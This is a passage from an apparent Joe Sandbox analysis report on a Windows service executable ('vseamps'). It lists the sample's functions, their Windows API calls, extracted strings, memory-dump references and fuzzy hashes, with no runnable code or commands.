Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
Instruction Fuzzy Hash: 6E317C32B15F41C9E700CBA2D8403AE73BAEB88798F548575EE4D13B54EE38D551C740

Function 00007FFE11EC11B0 Relevance: 3.2, APIs: 2, Instructions: 235
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFE11EC14EB
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE11EC14F7

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 73155330-0
Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
Instruction ID: ed49facb95aed47c346cff9d8b68b6f82b21a536d82e4f25c28551b1490179af
Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
Instruction Fuzzy Hash: 89813E32A19F9285E7118B769C002BAA698FF56BE4F548335EF59577A2DF3CF0918300

Non-executed Functions

Function 0000000140001A30 Relevance: 37.9, APIs: 30, Instructions: 422memorystringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140001AA6
LeaveCriticalSection.KERNEL32 ref: 0000000140001B30
EnterCriticalSection.KERNEL32 ref: 0000000140001B48
LeaveCriticalSection.KERNEL32 ref: 0000000140001BC9
EnterCriticalSection.KERNEL32 ref: 0000000140001BE6
LeaveCriticalSection.KERNEL32 ref: 0000000140001C67
EnterCriticalSection.KERNEL32 ref: 0000000140001C84
LeaveCriticalSection.KERNEL32 ref: 0000000140001D0D
lstrlenW.KERNEL32 ref: 0000000140001D1F
GetProcessHeap.KERNEL32 ref: 0000000140001D2E
HeapAlloc.KERNEL32 ref: 0000000140001D3C
EnterCriticalSection.KERNEL32 ref: 0000000140001D6F
LeaveCriticalSection.KERNEL32 ref: 0000000140001DF0
lstrlenW.KERNEL32 ref: 0000000140001DFF
GetProcessHeap.KERNEL32 ref: 0000000140001E0E
HeapAlloc.KERNEL32 ref: 0000000140001E1C
EnterCriticalSection.KERNEL32 ref: 0000000140001E4F
LeaveCriticalSection.KERNEL32 ref: 0000000140001ED0
EnterCriticalSection.KERNEL32 ref: 0000000140001EED
LeaveCriticalSection.KERNEL32 ref: 0000000140001F6E
lstrlenW.KERNEL32 ref: 0000000140001F7D
GetProcessHeap.KERNEL32 ref: 0000000140001F8C
HeapAlloc.KERNEL32 ref: 0000000140001F9A
EnterCriticalSection.KERNEL32 ref: 0000000140001FCD
LeaveCriticalSection.KERNEL32 ref: 000000014000204E
lstrlenW.KERNEL32 ref: 000000014000205D
GetProcessHeap.KERNEL32 ref: 000000014000206C
HeapAlloc.KERNEL32 ref: 000000014000207A
EnterCriticalSection.KERNEL32 ref: 00000001400020B4
LeaveCriticalSection.KERNEL32 ref: 000000014000214E

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
String ID:
API String ID: 3526400053-0
Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740

Function 0000000140003F80 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 160timeCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
OpenProcessToken.ADVAPI32 ref: 0000000140004007
GetLastError.KERNEL32 ref: 0000000140004011
LookupPrivilegeValueW.ADVAPI32 ref: 000000014000403A
AdjustTokenPrivileges.ADVAPI32 ref: 0000000140004080
GetLastError.KERNEL32 ref: 000000014000408A
CloseHandle.KERNEL32 ref: 0000000140004095
EnterCriticalSection.KERNEL32 ref: 00000001400040B3
LeaveCriticalSection.KERNEL32 ref: 000000014000412B
GetVersionExW.KERNEL32 ref: 0000000140004155
RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
RpcServerListen.RPCRT4 ref: 00000001400041D3
CreateWaitableTimerW.KERNEL32 ref: 0000000140004205
CreateEventW.KERNEL32 ref: 000000014000421C
SetWaitableTimer.KERNEL32 ref: 0000000140004289

Strings

ampStartSingletone: logging started, settins=%s, xrefs: 0000000140003FD5
null, xrefs: 0000000140003FCE
SeLoadDriverPrivilege, xrefs: 000000014000402A

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
API String ID: 3408796845-4213300970
Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44

Function 00000001400042B0 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 59synchronizationtimethreadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
#4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
#4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6

Strings

ampStopSingletone: logging ended, xrefs: 00000001400043B2

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
String ID: ampStopSingletone: logging ended
API String ID: 2048888615-3533855269
Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744

Function 000000014000C3F0 Relevance: 29.0, APIs: 19, Instructions: 515COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00

Function 0000000140001520 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 95COMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32 ref: 00000001400015A4
GetLastError.KERNEL32 ref: 00000001400015B2

Part of subcall function 0000000140001430: GetModuleFileNameW.KERNEL32 ref: 000000014000145E
Part of subcall function 0000000140001430: OpenSCManagerW.ADVAPI32 ref: 000000014000146C
Part of subcall function 0000000140001430: GetLastError.KERNEL32 ref: 000000014000147A

Strings

/service, xrefs: 000000014000153F
vseamps, xrefs: 0000000140001538
/remove, xrefs: 000000014000157E

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: ErrorLastManagerOpen$FileModuleName
String ID: /remove$/service$vseamps
API String ID: 67513587-3839141145
Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704

Function 000000014000F000 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 152libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
GetProcAddress.KERNEL32 ref: 000000014000F0F3
GetProcAddress.KERNEL32 ref: 000000014000F117

Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2

Strings

GetProcessWindowStation, xrefs: 000000014000F10D
GetActiveWindow, xrefs: 000000014000F075
GetUserObjectInformationA, xrefs: 000000014000F0E9
USER32.DLL, xrefs: 000000014000F03B
GetLastActivePopup, xrefs: 000000014000F094
MessageBoxA, xrefs: 000000014000F054

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: AddressProc$Load$Library
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
API String ID: 3981747205-232180764
Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210

Function 00000001400022C0 Relevance: 15.1, APIs: 10, Instructions: 96threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 0000000140002315
CreateEventW.KERNEL32 ref: 0000000140002326
CreateEventW.KERNEL32 ref: 0000000140002340
CreateEventW.KERNEL32 ref: 000000014000235E
RpcImpersonateClient.RPCRT4 ref: 0000000140002372
GetCurrentThread.KERNEL32 ref: 0000000140002390
OpenThreadToken.ADVAPI32 ref: 00000001400023A7
RpcRevertToSelfEx.RPCRT4 ref: 0000000140002402

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
String ID:
API String ID: 4284112124-0
Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40

Function 0000000140001430 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52serviceCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 000000014000145E
OpenSCManagerW.ADVAPI32 ref: 000000014000146C
GetLastError.KERNEL32 ref: 000000014000147A
CreateServiceW.ADVAPI32 ref: 00000001400014D4
CloseServiceHandle.ADVAPI32 ref: 00000001400014E2
CloseServiceHandle.ADVAPI32 ref: 00000001400014F5

Strings

vseamps, xrefs: 00000001400014AD, 00000001400014B4

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
String ID: vseamps
API String ID: 3693165506-3944098904
Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00

Function 0000000140009300 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF

Strings

Runtime Error!Program: , xrefs: 000000014000938D
..., xrefs: 0000000140009431
Microsoft Visual C++ Runtime Library, xrefs: 00000001400094B4
<program name unknown>, xrefs: 00000001400093D9

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: FileModuleName
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 514040917-4022980321
Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304

Function 000000014000BB70 Relevance: 12.3, APIs: 8, Instructions: 256COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32 ref: 000000014000BBDC
GetLastError.KERNEL32 ref: 000000014000BBEC
LCMapStringW.KERNEL32 ref: 000000014000BC5F
WideCharToMultiByte.KERNEL32 ref: 000000014000BCC8
WideCharToMultiByte.KERNEL32 ref: 000000014000BD80
LCMapStringA.KERNEL32 ref: 000000014000BDA3

Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151

LCMapStringA.KERNEL32 ref: 000000014000BE48
MultiByteToWideChar.KERNEL32 ref: 000000014000BEC8

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: String$ByteCharMultiWide$AllocErrorHeapLast
String ID:
API String ID: 2057259594-0
Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700

Function 0000000140005A70 Relevance: 12.2, APIs: 8, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

GetStartupInfoW.KERNEL32 ref: 0000000140005A8B
GetProcessHeap.KERNEL32 ref: 0000000140005A92
HeapAlloc.KERNEL32 ref: 0000000140005AA3
GetVersionExA.KERNEL32 ref: 0000000140005AE6
GetProcessHeap.KERNEL32 ref: 0000000140005AF0
HeapFree.KERNEL32 ref: 0000000140005AFE
GetProcessHeap.KERNEL32 ref: 0000000140005B22
HeapFree.KERNEL32 ref: 0000000140005B30

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Heap$Process$Free$AllocInfoStartupVersion
String ID:
API String ID: 3103264659-0
Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741

Function 00007FFE11EC2630 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFE11EC264C
RtlCaptureContext.KERNEL32 ref: 00007FFE11EC2679
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFE11EC2693
RtlVirtualUnwind.KERNEL32 ref: 00007FFE11EC26D4
IsDebuggerPresent.KERNEL32 ref: 00007FFE11EC2728
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFE11EC2745
UnhandledExceptionFilter.KERNEL32 ref: 00007FFE11EC2750

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
Instruction ID: 22c1a2c0be3b65aba5325a6c01321f1a64e6d1fda02af0edf8a5effb65c0d2dc
Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
Instruction Fuzzy Hash: E0313B72609F8286EB609FA1EC403EE6369FB84764F44507ADA4E47BA8DF3CD548C710

Function 0000000140007C91 Relevance: 9.1, APIs: 6, Instructions: 137COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 0000000140007D66
IsDebuggerPresent.KERNEL32 ref: 0000000140007DAA
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140007DB4
UnhandledExceptionFilter.KERNEL32 ref: 0000000140007DBF
GetCurrentProcess.KERNEL32 ref: 0000000140007DD5
TerminateProcess.KERNEL32 ref: 0000000140007DE3

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
String ID:
API String ID: 1269745586-0
Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00

Function 00007FFE11EC76E0 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FFE11EC7759
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFE11EC7771
RtlVirtualUnwind.KERNEL32 ref: 00007FFE11EC77AC
IsDebuggerPresent.KERNEL32 ref: 00007FFE11EC77E5
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFE11EC77EF
UnhandledExceptionFilter.KERNEL32 ref: 00007FFE11EC77FA

Memory Dump Source

Source File: 00000005.00000002.2708963625.00007FFE11EC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000005.00000002.2708949937.00007FFE11EC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2708984743.00007FFE11ED2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709011665.00007FFE11EDD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2709027475.00007FFE11EDF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe11ec0000_Y1mbCC.jbxd

Similarity

